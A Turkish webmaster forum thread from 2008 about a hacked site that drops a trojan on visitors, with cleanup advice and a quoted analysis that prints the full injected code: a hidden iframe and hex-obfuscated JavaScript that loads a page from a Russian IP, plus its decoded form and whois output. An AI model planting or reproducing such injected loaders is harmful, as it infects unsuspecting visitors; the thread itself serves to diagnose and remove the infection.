Arkadaşlar Güncel Antivirüs programları giren arkadaşlarım sitede virüs bulunduğunu ve site açılırken bi dosya download edildiğini söylüyorlar ama bu güne kadar ben bu şekilde hiç karşılaşmadım bir bakarmısınız sizde de aynı sorunu veriyormu bende her sey normal cevap yazarsanız sevinirim çünki bu sorunu çözmem lazım antivirüs programı ne diyor trojenmi ne ? başarılr. hkapici2008-04-29 12:07:47

vallahji ben daha dün kurtuldum bi sitemde nasılmı...
index.php index.html index.asp dosyalarını komple sil orjinalleriyle değiştir admin cp klasorunu değiştirdir daha sonra ftp kullanıcı hesabının sifresini değiştir ben değiştirmediğim için 1 gun sonra yine ortaya cıktı cok lanet bişey bu site iframe virüsleri ftp hesabına kendisi bağlanıyor... pc nide kaspersky kur ve tarattır bende de kaspers yoktu nod 32 vardı uyarı vermedi kaspersky kurup siteme girdim harbiden trojen buluyordu sitede pc ni iyice temizle bu işlemleri yapmadan

HEUR/HTML.Malware Virüsüne dikkat…
Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' widş='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.lengş; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' widş='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is şe RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use şe “-B” flag.

% Information related to ‘77.221.128.0 - 77.221.143.255′

inetnum: 77.221.128.0 - 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an oşer comliants mailto:abuse@infobox.ru
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: abuse@infobox.ru
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ‘77.221.128.0/19AS30968′

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

<iframe src=”http://77.221.133.X/.dif/go.php?sid=1″ style=”border:0px solid gray;” WIDŞ=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDŞ=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….
Bu Konu Alıntıdır Arkadaşlar Benim Başıma Geldi ve bu Gün Bu Sorunu Çözmeyi Düşünüyorum

Arkadaşlar Casus Kodu Ni Hayetinde Buldum KaskerSky Çözdüm Login.asp De <body> Den Sonra Tanımsız Bir Script Atmış Kodları Sildim Simdi Sorunsuz Güvenliğini Aldım Tabiki Başına Gelen Arkadaşlarım Olabilir Dikkat Kafelerden Girmemelerini Rica Ediyorum Ftp adreslerine Benim Tahminen Kafeden Bilastı. İsteyen olursa kodu var bende bakmak için felan yolarım başarılar.